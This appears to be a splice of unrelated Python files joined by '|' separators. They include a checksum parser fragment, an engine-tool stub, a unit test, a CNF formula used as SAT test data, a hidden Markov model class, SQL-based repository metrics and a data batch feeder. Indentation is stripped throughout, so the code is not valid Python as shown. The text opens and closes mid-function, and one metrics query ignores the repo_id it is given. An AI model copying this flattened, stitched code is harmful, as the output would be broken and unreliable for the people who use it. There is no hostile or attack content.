m = re.search(pattern, output)
if m:
checksum_type = m.group('type')
checksum = m.group('checksum')
checksum = checksum.zfill(8) # make it 8 chars length (adler32 xrdcp fix)
filesize = m.group('filesize')
if filesize:
try:
filesize = int(filesize)
except ValueError as error:
logger.warning('failed to convert filesize to int: %s', error)
filesize = None
else:
logger.warning("WARNING: Checksum/file size info not found in output: failed to match pattern=%s in output=%s", pattern, output)
return filesize, checksum, checksum_type
|
"""
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
# -------------------------------------------------------------------------
"""DCCsi Tool and Application service launcher"""
def start_service():
"""Not Implemented"""
print('DCCsi.Tools.DCC.start_service() not implemented')
return None
###########################################################################
# Main Code Block, runs this script as main (testing)
# -------------------------------------------------------------------------
if __name__ == '__main__':
"""Run this file as main"""
start_service() |
import unittest
from metis.Constants import Constants
class ConstantsTest(unittest.TestCase):
def test_lookup(self):
self.assertEqual(Constants[Constants.DONE], "Constants.DONE")
self.assertEqual(Constants.get_name(Constants.DONE), "Constants.DONE")
if __name__ == "__main__":
unittest.main()
|
input = """
c num blocks = 1
c num vars = 200
c minblockids[0] = 1
c maxblockids[0] = 200
p cnf 200 810
51 12 -4 0
-15 -9 7 0
-91 57 -17 0
-89 -69 197 0
4 68 113 0
-25 2 168 0
43 146 -61 0
-84 -200 88 0
-70 112 -96 0
131 18 72 0
97 161 -193 0
44 41 -80 0
194 -11 -116 0
-126 -162 65 0
-84 183 -155 0
-172 -122 135 0
-52 -189 31 0
-186 57 151 0
110 -66 -6 0
46 176 45 0
37 -3 -181 0
-106 34 171 0
32 188 126 0
10 -148 120 0
-113 -26 180 0
-153 -56 192 0
-88 59 193 0
-183 176 185 0
27 -112 86 0
-73 -4 -71 0
-77 -131 31 0
-52 74 -106 0
-40 10 -158 0
-127 31 -44 0
-47 109 -103 0
-73 82 122 0
178 119 -54 0
-70 -31 -47 0
-91 28 -99 0
-16 -8 181 0
168 -73 180 0
-170 120 -190 0
81 -174 195 0
-46 3 -77 0
-102 10 -66 0
102 131 163 0
-42 -10 43 0
-188 -164 -61 0
-111 157 -60 0
158 19 72 0
21 -29 -181 0
23 -11 177 0
-26 -131 -67 0
-97 122 -185 0
27 -113 -56 0
55 129 155 0
-126 -117 -167 0
25 115 -90 0
-66 171 -95 0
36 7 46 0
-33 65 -32 0
58 157 144 0
-39 67 190 0
-90 160 142 0
52 81 -200 0
-35 93 123 0
-98 -114 200 0
115 140 98 0
33 102 10 0
-121 32 -132 0
-72 -110 61 0
165 81 123 0
42 -142 55 0
105 -70 94 0
101 159 14 0
136 43 -104 0
-25 -11 -94 0
65 -69 -60 0
-188 -24 -58 0
32 -59 -150 0
168 148 44 0
-66 64 109 0
-29 -98 -105 0
-180 108 -154 0
-61 -174 -197 0
108 -196 138 0
76 -22 -125 0
-191 93 83 0
96 -12 -4 0
73 61 196 0
151 -6 -40 0
167 163 48 0
-62 132 178 0
174 -157 -40 0
191 151 62 0
-163 -113 126 0
-107 95 167 0
188 197 130 0
43 136 -46 0
7 -151 194 0
24 39 -168 0
-178 -190 174 0
-119 -53 63 0
41 179 -77 0
-161 -23 74 0
-149 -12 -173 0
83 91 82 0
-10 182 80 0
-33 162 30 0
-56 -93 44 0
-101 87 127 0
-180 197 98 0
187 142 -160 0
-14 -155 198 0
115 -34 -107 0
154 -153 121 0
102 175 157 0
-82 53 174 0
132 116 -96 0
-128 186 67 0
-109 -112 -10 0
113 -17 -36 0
-50 -55 48 0
44 -131 187 0
176 26 -152 0
10 -164 -110 0
-166 62 -180 0
-157 71 169 0
30 -111 -28 0
-84 102 155 0
128 -16 -119 0
-135 34 195 0
-128 -157 -34 0
58 -97 -169 0
143 -141 196 0
15 -37 98 0
-83 36 -62 0
104 -95 -191 0
-49 135 106 0
-52 -5 -29 0
63 -177 -3 0
-124 32 177 0
-161 -60 132 0
13 -3 133 0
125 -159 172 0
46 48 -7 0
-189 66 38 0
140 188 86 0
65 178 -20 0
195 -94 -117 0
121 80 -76 0
-97 15 84 0
-118 28 -186 0
37 -39 60 0
-110 14 -72 0
-153 -200 107 0
36 1 -200 0
-106 175 170 0
26 -35 -80 0
37 184 -52 0
22 -112 5 0
21 166 103 0
80 -140 -62 0
-138 -130 -97 0
-131 129 177 0
-153 4 -22 0
195 -89 114 0
120 65 36 0
-43 199 37 0
-149 158 33 0
183 -180 -115 0
122 188 80 0
-195 21 -179 0
134 -97 -49 0
-199 107 -65 0
23 -86 -126 0
92 -128 -72 0
128 -85 -83 0
164 182 11 0
-122 -133 -148 0
71 120 -144 0
69 121 -190 0
-156 107 82 0
102 199 -85 0
-179 -173 -153 0
-24 -151 54 0
40 92 -58 0
-142 184 -170 0
196 -192 199 0
-110 22 130 0
-51 196 -34 0
-186 101 142 0
151 101 22 0
-191 -8 -17 0
118 -178 160 0
-199 24 -113 0
-108 -37 -90 0
121 -13 194 0
-69 -179 -124 0
-198 -69 37 0
176 86 -63 0
116 44 -29 0
144 141 -91 0
-24 118 147 0
-57 100 75 0
-153 32 53 0
21 -143 -105 0
-152 167 -178 0
-187 105 183 0
167 149 41 0
-200 -65 105 0
-148 -102 46 0
200 -94 -115 0
-72 25 -185 0
-39 192 143 0
120 15 -160 0
184 -133 124 0
163 151 -130 0
-152 -14 200 0
-200 -198 43 0
-23 -141 97 0
140 -12 -30 0
26 -167 199 0
190 -127 163 0
30 46 -146 0
-74 48 30 0
-51 8 -85 0
61 120 193 0
18 -137 193 0
61 149 -2 0
57 109 -188 0
-155 109 58 0
50 95 -5 0
-190 -200 52 0
143 17 -185 0
159 172 174 0
-31 152 84 0
-53 -18 -116 0
198 -155 -196 0
136 -153 -106 0
135 -123 -24 0
-23 25 -154 0
109 -41 176 0
-97 192 83 0
-176 23 158 0
-84 -80 95 0
6 -135 -50 0
54 85 -163 0
-70 81 137 0
66 113 -129 0
104 11 -73 0
-74 -163 -140 0
128 174 183 0
-197 -133 173 0
16 -125 -123 0
21 60 -83 0
37 131 35 0
184 -129 -93 0
196 -43 66 0
132 -170 175 0
23 -17 -147 0
61 4 93 0
114 131 123 0
-186 -50 144 0
44 9 187 0
59 -143 -168 0
172 169 -192 0
118 123 181 0
63 -177 -182 0
9 17 65 0
31 17 170 0
-192 -181 -79 0
86 151 82 0
-67 -73 -63 0
113 193 -6 0
-44 -140 187 0
112 -14 -109 0
23 -198 -119 0
73 -128 159 0
-15 35 107 0
83 116 25 0
-134 -54 80 0
-41 70 -128 0
-35 -76 -155 0
-139 15 200 0
-74 84 27 0
102 -156 -112 0
-81 95 197 0
-99 -98 -186 0
11 -51 129 0
127 94 -30 0
41 173 182 0
162 22 -102 0
-196 -122 -49 0
46 160 -64 0
-183 105 155 0
-164 -87 -107 0
83 -4 74 0
138 45 -122 0
-107 32 25 0
55 -70 146 0
38 157 -34 0
193 -145 188 0
55 101 185 0
-59 168 184 0
75 -58 -96 0
-159 -57 121 0
33 -111 12 0
74 136 144 0
-177 68 -40 0
34 -119 105 0
-87 -86 55 0
-186 -85 -64 0
-40 176 -16 0
-9 -82 110 0
-143 89 -55 0
192 171 -87 0
100 189 -11 0
-124 -117 -46 0
22 130 55 0
-153 -83 19 0
-176 -41 121 0
-97 31 64 0
-93 186 74 0
35 -13 56 0
178 14 -104 0
-35 170 132 0
-70 -160 -8 0
-42 181 -81 0
161 -17 -46 0
-139 130 117 0
167 42 -115 0
-2 -118 149 0
99 -72 -49 0
-127 161 49 0
-140 -39 -172 0
151 -118 -117 0
-53 102 50 0
-115 63 -96 0
43 -24 -152 0
101 -84 -184 0
-144 -185 -87 0
158 -133 -107 0
4 47 190 0
-194 -152 -109 0
81 56 -8 0
-94 -63 73 0
-11 -74 18 0
-88 -126 -95 0
-56 -111 95 0
-166 52 156 0
105 -71 -168 0
143 86 118 0
-185 -125 -136 0
-170 -117 67 0
-124 -163 60 0
-142 -52 -4 0
13 -27 154 0
-182 159 -163 0
-200 110 -184 0
178 -91 -164 0
118 34 -151 0
-26 -73 -101 0
27 125 -119 0
-103 147 96 0
-38 8 14 0
149 43 -3 0
199 149 93 0
-18 40 136 0
-48 52 -167 0
69 151 -47 0
182 61 -151 0
-118 106 6 0
-32 53 40 0
-181 196 94 0
64 12 164 0
-53 91 149 0
-120 183 -194 0
128 131 -87 0
-34 -110 -122 0
121 -45 99 0
127 142 -22 0
-61 84 -110 0
16 -116 90 0
66 -115 -189 0
-159 -182 149 0
126 62 86 0
181 33 -75 0
-175 82 151 0
38 -69 18 0
-168 -5 177 0
-61 79 -180 0
23 -102 167 0
-78 185 53 0
-130 58 -178 0
136 -116 -56 0
-125 -185 -116 0
-166 -47 64 0
35 -156 68 0
196 -171 102 0
23 62 -25 0
62 15 -161 0
90 43 -5 0
-29 -94 -193 0
-18 -111 -56 0
-88 -19 193 0
-138 39 -137 0
53 2 -200 0
-9 25 -20 0
92 5 39 0
99 196 50 0
-122 -66 -51 0
117 57 132 0
-46 -188 9 0
-61 -58 57 0
196 -199 -67 0
-46 64 52 0
-194 165 20 0
-110 -88 121 0
190 -80 -111 0
-4 -87 192 0
149 -187 178 0
-33 -1 62 0
171 159 -114 0
-63 -130 158 0
126 68 -47 0
-85 72 -149 0
-161 -121 -185 0
-90 -137 -144 0
-43 -56 165 0
96 -143 187 0
-43 -196 -170 0
-151 -95 -18 0
64 21 134 0
78 -174 -122 0
7 -78 -37 0
-71 157 1 0
-50 56 -94 0
-120 172 -108 0
131 -11 118 0
-40 21 -36 0
112 -165 88 0
-122 65 174 0
-58 -136 -121 0
134 -27 -157 0
-55 163 -72 0
59 34 72 0
143 47 -11 0
112 -63 171 0
190 -41 114 0
151 -103 13 0
141 44 90 0
6 198 19 0
-164 177 1 0
-36 34 -20 0
198 159 107 0
-31 158 -3 0
196 -42 10 0
-26 116 -54 0
79 -46 -126 0
94 -164 81 0
-184 -136 -147 0
48 64 2 0
-17 -50 86 0
89 -127 -200 0
-187 128 -41 0
-157 -189 -12 0
-14 -124 69 0
-50 7 158 0
89 35 -170 0
147 -187 19 0
-82 126 -114 0
-23 30 -121 0
50 -25 -110 0
-163 166 -132 0
-96 -45 -78 0
14 -168 98 0
166 -98 -100 0
-61 -36 -25 0
10 170 -40 0
130 173 106 0
-103 -96 -104 0
-142 -16 117 0
-101 82 -51 0
127 -6 -181 0
118 157 -56 0
126 -25 3 0
176 5 -44 0
149 27 -70 0
46 -73 117 0
115 177 -104 0
-194 61 19 0
-150 160 -55 0
-5 80 -72 0
-170 -107 191 0
-136 -144 -156 0
172 37 -116 0
-143 68 163 0
112 15 141 0
-99 -128 162 0
-127 -186 -51 0
103 3 189 0
-180 -16 128 0
105 -82 115 0
70 -15 73 0
-5 -168 -57 0
-146 164 82 0
-175 158 40 0
11 -33 35 0
72 -160 -166 0
23 55 181 0
161 -54 -165 0
156 28 123 0
-5 -105 -126 0
193 102 -200 0
-2 47 90 0
190 52 -27 0
85 57 -58 0
166 -143 3 0
-58 -143 -109 0
163 92 -35 0
114 -26 188 0
5 83 -6 0
123 101 -80 0
111 173 26 0
128 169 182 0
75 -121 -183 0
66 -178 -136 0
-134 99 -200 0
-103 183 -115 0
-110 -136 -118 0
-150 -189 112 0
-90 30 54 0
-82 123 156 0
187 -193 139 0
-153 -147 197 0
-167 105 -22 0
-134 193 47 0
-17 -47 150 0
170 -200 -198 0
23 99 -136 0
42 -52 100 0
-18 129 154 0
65 177 135 0
48 51 165 0
-48 176 194 0
10 -38 54 0
99 -129 195 0
-95 20 -52 0
161 198 -60 0
135 -155 184 0
-89 -141 19 0
-31 184 -40 0
82 -91 121 0
-112 186 84 0
-24 14 -135 0
-7 134 160 0
10 28 101 0
-34 121 -165 0
-51 46 21 0
-94 -99 -62 0
-73 -146 115 0
10 9 40 0
-198 -120 -192 0
87 127 -139 0
141 -7 74 0
-90 85 -170 0
-119 -200 -64 0
18 -133 -144 0
171 -7 196 0
-107 -186 144 0
-196 37 -22 0
198 40 46 0
-197 -131 -138 0
-100 194 135 0
-91 196 -139 0
164 143 101 0
101 71 192 0
-130 -63 -188 0
170 -163 73 0
-95 50 -54 0
-102 -27 -108 0
-52 141 -69 0
68 -161 -153 0
-49 -66 28 0
-116 200 -193 0
-169 -18 159 0
-145 -149 -105 0
-126 109 -38 0
-41 142 -2 0
-64 -146 92 0
82 -161 -197 0
-17 47 153 0
194 6 2 0
84 -143 -145 0
-14 8 -122 0
-76 -40 -59 0
54 -162 99 0
-151 -57 119 0
-136 60 132 0
72 -6 64 0
144 193 88 0
-68 108 -36 0
-12 63 -167 0
12 -122 -102 0
30 -165 -37 0
198 29 26 0
9 -171 -18 0
170 -77 -183 0
-149 -116 29 0
-34 5 116 0
60 127 -148 0
146 -192 17 0
-44 -13 -8 0
155 -25 -188 0
31 -163 53 0
-45 165 36 0
122 24 92 0
36 4 161 0
-88 110 173 0
-136 -171 122 0
192 -135 -84 0
-34 -90 -99 0
-31 -29 -102 0
52 185 -97 0
-52 66 56 0
35 63 -40 0
-8 -185 134 0
124 -63 -24 0
83 -133 -180 0
126 -196 168 0
67 -63 -96 0
111 185 174 0
128 -131 -43 0
-114 -173 -154 0
120 35 -124 0
192 56 -31 0
118 194 139 0
-195 64 71 0
-103 147 -84 0
147 -114 116 0
-84 -200 -59 0
184 -198 -89 0
-124 -111 110 0
-186 100 -198 0
-151 -143 74 0
13 173 -52 0
-38 114 -177 0
-75 10 89 0
175 -152 -48 0
164 59 160 0
-151 58 -171 0
85 176 -109 0
-35 -79 41 0
178 75 -71 0
170 -88 -84 0
-67 -160 -33 0
44 140 79 0
-46 -142 29 0
-43 -102 -108 0
197 71 163 0
158 -87 -139 0
101 29 48 0
-3 38 193 0
9 142 152 0
116 121 21 0
14 133 21 0
-193 -9 197 0
2 28 -111 0
171 116 110 0
-184 25 62 0
88 138 -92 0
56 97 -59 0
107 85 26 0
146 111 91 0
-31 162 145 0
-81 119 -106 0
19 55 -77 0
59 -90 96 0
107 -131 -25 0
-32 48 -135 0
2 150 -58 0
-66 -99 -83 0
-9 -32 79 0
62 -29 49 0
21 -154 -72 0
-139 -144 -192 0
-36 141 -43 0
133 -72 19 0
43 -104 -28 0
151 -42 -195 0
182 -144 -9 0
-24 54 -62 0
-164 127 -136 0
-188 129 60 0
140 77 -31 0
-100 -36 28 0
-59 81 7 0
-67 -90 -60 0
-95 155 135 0
-53 89 -174 0
52 -158 -180 0
131 -63 -193 0
-176 -128 -175 0
10 -131 98 0
123 138 -149 0
-2 -143 181 0
-165 137 148 0
173 -191 -97 0
-198 -36 -73 0
-73 -191 -140 0
-73 -167 154 0
149 -6 -32 0
-47 -165 -102 0
-121 -173 146 0
198 -39 180 0
-63 32 -25 0
161 43 -170 0
-183 -83 -55 0
-179 96 31 0
-132 194 -154 0
-106 -91 23 0
63 45 66 0
178 120 -21 0
-127 10 -144 0
1 -31 -27 0
-68 -13 -168 0
145 103 -138 0
10 181 75 0
164 128 -11 0
-164 15 -77 0
-103 -144 -113 0
171 7 140 0
-170 101 -129 0
134 75 -113 0
-130 58 41 0
87 63 91 0
-157 -148 101 0
-150 -148 101 0
167 -51 -152 0
-104 -6 163 0
65 -98 -188 0
-108 137 -110 0
-37 -150 177 0
137 -193 -6 0
-171 -177 32 0
162 -97 56 0
35 -26 143 0
-60 -127 -165 0
-160 -61 11 0
-94 32 -190 0
101 15 -169 0
68 62 -94 0
55 5 -126 0
-105 69 -192 0
115 149 -198 0
-73 190 31 0
-154 97 -91 0
-91 85 -40 0
92 -173 -23 0
82 -39 192 0
-55 178 -156 0
-31 185 93 0
113 -99 -85 0
184 93 -135 0
170 -92 -176 0
60 -183 194 0
90 -11 59 0
6 -78 88 0
156 -198 51 0
148 134 -15 0
-62 -71 -85 0
170 68 -133 0
82 -95 -122 0
114 -133 -75 0
170 27 -151 0
-64 127 121 0
102 175 -122 0
-69 -139 165 0
183 37 47 0
-172 76 -187 0
-120 -182 27 0
33 129 102 0
-4 -162 36 0
143 -58 -79 0
146 120 35 0
80 -99 -108 0
-39 138 64 0
125 -97 -59 0
-81 75 164 0
158 -70 108 0
113 -124 122 0
138 -198 133 0
45 67 -183 0
44 -155 30 0
151 2 92 0
-11 -19 -83 0
44 -179 31 0
-115 -184 70 0
181 12 90 0
12 188 -7 0
-138 174 189 0
159 -99 56 0
-47 78 87 0
-117 -177 47 0
-80 -186 -135 0
94 196 145 0
-58 -132 -20 0
78 69 -102 0
-58 146 -123 0
"""
output = "SAT"
|
""" Useful numerical constants.
Attributes
----------
inf_bound : float
This parameter is intended to be used to denote a infinite bound on
a design variable or constraint. The default value of 2.0e20 is
large enough that it will trigger special treatment of the bound
as infinite by optimizers like SNOPT and IPOPT, but is not so large
as to cause overflow/underflow errors as numpy.inf sometimes can.
"""
inf_bound = 2.0e20
|
import numpy as np
import hiddenmm.model.markov_chain as mc
import hiddenmm.constants as constants
import hiddenmm.numeric_util as nutil
class DiscreteHiddenMM:
""" Class implementing a discrete Hidden Markov Model """
def __init__(self, markov_chain: mc.MarkovChain, projection: np.ndarray):
self.markov_chain = markov_chain
self.projection = projection
self.num_outputs = self.projection.shape[1]
if self.markov_chain.num_states != projection.shape[0]:
raise ValueError("Dimension mismatch: projection dies not match number of states of Markov Chain")
if not np.all((self.projection.sum(axis=1) - 1.0) < constants.EPSILON):
raise ValueError("Projection matrix distribution does not sum up to one.")
if not np.all(self.projection >= 0.0):
raise ValueError("Projection matrix distribution must be positive.")
@property
def num_states(self) -> int:
""" Number of markov chain states """
return self.markov_chain.num_states
@property
def initial_distribution(self) -> np.ndarray:
""" Initial state probability distribution """
return self.markov_chain.initial
@property
def transition_matrix(self) -> np.ndarray:
""" Markov Chain transition matrix """
return self.markov_chain.transition_matrix
def generate(self, n: int) -> np.ndarray:
""" Generate given markov model """
underlying_chain = self.markov_chain.generate(n)
result = []
for i in range(n):
result.append(np.random.choice(self.num_outputs, p=self.projection[underlying_chain[i]]))
return np.vstack([underlying_chain, np.array(result, dtype=int)]).T
def _helper_alpha(self, observations: np.ndarray, stable=False) -> (np.ndarray, np.ndarray):
""" Return a helper "alpha" variable matrix over time for given observation series """
alpha = np.zeros((observations.shape[0], self.num_states), dtype=float)
multipliers = np.ones(observations.shape[0], dtype=float)
# Initialization
alpha[0] = self.initial_distribution * self.projection[:, observations[0]]
if stable:
alpha[0], multipliers[0] = nutil.rescale_vector(alpha[0])
# Induction
for i in range(1, observations.shape[0]):
alpha[i] = (alpha[i-1] @ self.transition_matrix) * self.projection[:, observations[i]]
if stable:
alpha[i], multipliers[i] = nutil.rescale_vector(alpha[i])
return alpha, multipliers
def _helper_beta(self, observations: np.ndarray, stable=False) -> (np.ndarray, np.ndarray):
""" Return a helper "beta" variable matrix over time for given observation series """
beta = np.zeros((observations.shape[0], self.num_states), dtype=float)
multipliers = np.ones(observations.shape[0], dtype=float)
# Initialization
beta[observations.shape[0]-1] = 1.0
multipliers[observations.shape[0]-1] = 1.0
# Induction
for i in range(observations.shape[0] - 1, 0, -1):
beta[i-1] = self.transition_matrix @ (self.projection[:, observations[i]] * beta[i])
if stable:
beta[i-1], multipliers[i-1] = nutil.rescale_vector(beta[i-1])
return beta, multipliers
def _helper_delta_psi(self, observations: np.ndarray, stable=False) -> (np.ndarray, np.ndarray):
""" Return a helper "delta" variable matrix over time for given observation series """
delta = np.zeros((observations.shape[0], self.num_states), dtype=float)
psi = np.zeros((observations.shape[0], self.num_states), dtype=int)
if stable:
delta[0] = np.log(self.initial_distribution) + np.log(self.projection[:, observations[0]])
else:
delta[0] = self.initial_distribution * self.projection[:, observations[0]]
for i in range(1, observations.shape[0]):
# Reshape the buffer to make sure the multiplication is broadcasted correctly
previous_step = delta[i-1].reshape((self.num_states, 1))
if stable:
local_likelihoods = previous_step + np.log(self.transition_matrix)
else:
local_likelihoods = previous_step * self.transition_matrix
new_likelihood = local_likelihoods.max(axis=0)
psi[i] = local_likelihoods.argmax(axis=0)
if stable:
delta[i] = new_likelihood + np.log(self.projection[:, observations[i]])
else:
delta[i] = new_likelihood * self.projection[:, observations[i]]
return delta, psi
def likelihood(self, observations: np.ndarray) -> float:
""" Return likelihood of supplied observation series """
dimension = observations.shape[0]
# Short-circuit
if dimension == 0:
return 0.0
alpha, multipliers = self._helper_alpha(observations, stable=False)
return alpha[-1].sum()
def log_likelihood(self, observations: np.ndarray, stable=True) -> float:
""" Return likelihood of supplied observation series """
dimension = observations.shape[0]
# Short-circuit
if dimension == 0:
return 0.0
alpha, multipliers = self._helper_alpha(observations, stable=stable)
return np.log(alpha[-1].sum()) - np.log(multipliers).sum()
def solve_for_states(self, observations: np.ndarray, stable=True) -> np.ndarray:
""" Solve for the most probable state sequence for given observation series """
dimension = observations.shape[0]
# Short-circuit
if dimension == 0:
return np.array([], dtype=int)
delta, psi = self._helper_delta_psi(observations, stable=stable)
result = []
final_state = np.argmax(delta[dimension-1])
result.append(final_state)
current_state = final_state
# Walk through the time back and reconstruct the state sequence
for i in range(dimension-1, 0, -1):
if stable:
if delta[i][current_state] <= -np.inf:
raise ValueError("Impossible observation sequence [likelihood = 0].")
else:
if delta[i][current_state] <= 0.0:
raise ValueError("Impossible observation sequence [likelihood = 0].")
current_state = psi[i][current_state]
result.append(current_state)
return np.array(result[::-1], dtype=int)
def fit_single(self, observations: np.ndarray, stable=True) -> 'DiscreteHiddenMM':
""" Perform an expectation-maximization procedure on the hidden markov chain model """
dimension = observations.shape[0]
if dimension > 0:
# Helper variables
alpha, alpha_multipliers = self._helper_alpha(observations, stable=stable)
beta, beta_multipliers = self._helper_beta(observations, stable=stable)
# Output will be stored in these variables
new_initial_distribution = np.zeros(self.num_states, dtype=float)
new_transition_numerator = np.zeros((self.num_states, self.num_states), dtype=float)
new_transition_denominator = np.zeros((self.num_states, self.num_states), dtype=float)
new_projection_numerator = np.zeros((self.num_states, self.num_outputs), dtype=float)
new_projection_denominator = np.zeros((self.num_states, self.num_outputs), dtype=float)
# The actual content of the algorithm is iterating the xi matrix through time
for i in range(dimension):
gamma = (alpha[i] * beta[i]) / (alpha[i] * beta[i]).sum()
# This piece is only executed in the first step
if i == 0:
new_initial_distribution = gamma
# We have to skip the last step as there are one less transitions than observations
if i < dimension - 1:
xi_numerator = (
self.transition_matrix *
np.outer(alpha[i], self.projection[:, observations[i+1]] * beta[i+1])
)
xi = xi_numerator / xi_numerator.sum()
new_transition_numerator += xi
new_transition_denominator += gamma.reshape((self.num_states, 1))
new_projection_numerator[:, observations[i]] += gamma
new_projection_denominator += gamma.reshape((self.num_states, 1))
new_transition = new_transition_numerator / new_transition_denominator
new_projection = new_projection_numerator / new_projection_denominator
# A way to handle divisions 0/0
new_transition = np.where(np.isnan(new_transition), np.eye(self.num_states), new_transition)
new_projection = np.where(np.isnan(new_projection), 1.0 / self.num_outputs, new_projection)
return DiscreteHiddenMM(mc.MarkovChain(new_initial_distribution, new_transition), new_projection)
else:
return self
|
"""
Metrics that provide data about with insight detection and reporting
"""
import datetime
import sqlalchemy as s
import pandas as pd
from augur.util import logger, annotate, add_metrics
@annotate(tag='top-insights')
def top_insights(self, repo_group_id, num_repos=6):
"""
Timeseries of pull request acceptance rate (expressed as the ratio of pull requests merged on a date to the count of pull requests opened on a date)
:return: DataFrame with top insights across all repos
"""
topInsightsSQL = s.sql.text("""
SELECT rg_name, repo.repo_group_id, repo_insights.repo_id, repo_git, ri_metric, ri_field, ri_value AS value,
ri_date AS date, ri_fresh AS discovered
FROM repo_insights JOIN repo ON repo.repo_id = repo_insights.repo_id JOIN repo_groups ON repo.repo_group_id = repo_groups.repo_group_id
WHERE repo_insights.repo_id IN (
SELECT repo_id
FROM repo
WHERE repo_group_id = :repo_group_id
AND repo_id IN (SELECT repo_id FROM repo_insights GROUP BY repo_id, ri_id HAVING 304 > count(repo_insights.repo_id) ORDER BY ri_id desc)
LIMIT :num_repos
)
""")
results = pd.read_sql(topInsightsSQL, self.database, params={'repo_group_id': repo_group_id, 'num_repos': num_repos})
return results
@annotate(tag='testing-coverage')
def testing_coverage(self, repo_group_id, repo_id=None, period='day', begin_date=None, end_date=None):
"""
<the metric analzyes how much a repository is tested>
:parameter repo_group_id: The repository’s group id
:return: Dataframe of <testing-coverage for a repository>
"""
if not begin_date:
begin_date = '1970-1-1 00:00:00'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d %H:%M')
if not repo_id:
testing_coverage_SQL = s.sql.text("""
SELECT
repo_test_coverage.repo_id,
repo_test_coverage.file_subroutines_tested,
repo_test_coverage.file_subroutine_count,
repo_test_coverage.file_statements_tested,
repo_test_coverage.file_statement_count
FROM augur_data.repo_test_coverage JOIN augur_data.repo on repo_test_coverage.repo_id in (SELECT repo_id
FROM augur_data.repo
WHERE repo_group_id = :repo_group_id)
GROUP BY repo_test_coverage.repo_id
""")
results = pd.read_sql(testing_coverage_SQL, self.database, params={'repo_group_id': repo_group_id, 'period': period, 'begin_date': begin_date, 'end_date': end_date})
# output the testing coverage as percentages, one for subroutines tested and one for statements tested
return results
else:
testing_coverage_SQL = s.sql.text("""
SELECT
augur_data.repo_test_coverage.file_subroutines_tested,
augur_data.repo_test_coverage.file_subroutine_count,
augur_data.repo_test_coverage.file_statements_tested,
augur_data.repo_test_coverage.file_statement_count
FROM augur_data.repo_test_coverage JOIN augur_data.repo on repo_test_coverage.repo_id in (SELECT repo_id
FROM augur_data.repo
WHERE repo_group_id = :repo_group_id)
GROUP BY augur_data.repo_test_coverage.repo_id
""")
results = pd.read_sql(testing_coverage_SQL, self.database, params={'repo_id': repo_id, 'period': period, 'begin_date': begin_date, 'end_date': end_date})
# same as above for outputting percentages
return results
def create_insight_metrics(metrics):
add_metrics(metrics, __name__)
|
#!/usr/bin/env python
#
# entp_plots.py
#
import matplotlib.pyplot as plt
import numpy as np
fig = plt.figure()
# Reading data
ent = (np.loadtxt('t-fixed-2.0.DAT')).T
plt.xlabel('$t \Delta$')
plt.ylabel('$\sigma(t)$', rotation='horizontal')
plt.plot(ent[0], ent[1], 'y-')
plt.grid(True)
plt.show()
|
import numpy as np
import scipy.io as sio
np.random.seed(0)
VGG_MEAN = [103.939, 116.779, 123.68]
def read_mat(path):
return np.load(path)
def write_mat(path, m):
np.save(path, m)
def read_ids(path):
return [line.rstrip('\n') for line in open(path)]
class Batch_Feeder:
def __init__(self, dataset, indices, train, batchSize, padWidth, padHeight, flip=False, keepEmpty=False):
self._epochs_completed = 0
self._index_in_epoch = 0
self._dataset = dataset
self._indices = indices
self._train = train
self._batchSize = batchSize
self._padWidth = padWidth
self._padHeight = padHeight
self._flip = flip
self._keepEmpty = keepEmpty
def set_paths(self, idList=None, gtDir=None, ssDir=None):
self._paths = []
if self._train:
for id in idList:
if self._dataset == "kitti":
self._paths.append([id, gtDir+'/'+id+'.mat', ssDir+'/'+id+'.mat'])
elif self._dataset == "cityscapes" or self._dataset == "pascal":
self._paths.append([id,
gtDir + '/' + id + '_unified_GT.mat',
ssDir + '/' + id + '_unified_ss.mat'])
else:
for id in idList:
if self._dataset == "kitti":
self._paths.append([id, ssDir+'/'+id+'.mat'])
elif self._dataset == "cityscapes" or self._dataset == "pascal":
self._paths.append([id,
ssDir + '/' + id + '_unified_ss.mat'])
self._numData = len(self._paths)
assert self._batchSize < self._numData
def shuffle(self):
np.random.shuffle(self._paths)
def next_batch(self):
idBatch = []
dirBatch = []
gtBatch = []
ssBatch = []
weightBatch = []
if self._train:
while (len(idBatch) < self._batchSize):
ss = (sio.loadmat(self._paths[self._index_in_epoch][2])['mask']).astype(float)
ss = np.sum(ss[:,:,self._indices], 2)
if ss.sum() > 0 or self._keepEmpty:
idBatch.append(self._paths[self._index_in_epoch][0])
dir = (sio.loadmat(self._paths[self._index_in_epoch][1])['dir_map']).astype(float)
gt = (sio.loadmat(self._paths[self._index_in_epoch][1])['depth_map']).astype(float)
weight = (sio.loadmat(self._paths[self._index_in_epoch][1])['weight_map']).astype(float)
dirBatch.append(self.pad(dir))
gtBatch.append(self.pad(gt))
weightBatch.append(self.pad(weight))
ssBatch.append(ss)
self._index_in_epoch += 1
if self._index_in_epoch == self._numData:
self._index_in_epoch = 0
self.shuffle()
dirBatch = np.array(dirBatch)
gtBatch = np.array(gtBatch)
ssBatch = np.array(ssBatch)
weightBatch = np.array(weightBatch)
if self._flip and np.random.uniform() > 0.5:
for i in range(len(dirBatch)):
for j in range(2):
dirBatch[i,:,:,j] = np.fliplr(dirBatch[i,:,:,j])
dirBatch[i, :, :, 0] = -1 * dirBatch[i, :, :, 0]
ssBatch[i] = np.fliplr(ssBatch[i])
gtBatch[i] = np.fliplr(gtBatch[i])
weightBatch[i] = np.fliplr(weightBatch[i])
return dirBatch, gtBatch, weightBatch, ssBatch, idBatch
else:
for example in self._paths[self._index_in_epoch:min(self._index_in_epoch + self._batchSize, self._numData)]:
dirBatch.append(self.pad((sio.loadmat(example[1])['dir_map']).astype(float)))
idBatch.append(example[0])
ss = (sio.loadmat(example[2])['mask']).astype(float)
ss = np.sum(ss[:, :, self._indices], 2)
ssBatch.append(self.pad(ss))
# imageBatch = np.array(imageBatch)
dirBatch = np.array(dirBatch)
ssBatch = np.array(ssBatch)
# return imageBatch, dirBatch, ssBatch, idBatch
self._index_in_epoch += self._batchSize
return dirBatch, ssBatch, idBatch
def total_samples(self):
return self._numData
def image_scaling(self, rgb_scaled):
# if self._dataset == "cityscapes":
# rgb_scaled = skimage.transform.pyramid_reduce(rgb_scaled, sigma=0.001)
#rgb_scaled = skimage.transform.rescale(rgb_scaled, 0.5)
rgb_scaled[:,:,0] = (rgb_scaled[:,:,0] - VGG_MEAN[0])/128
rgb_scaled[:,:,1] = (rgb_scaled[:,:,1] - VGG_MEAN[1])/128
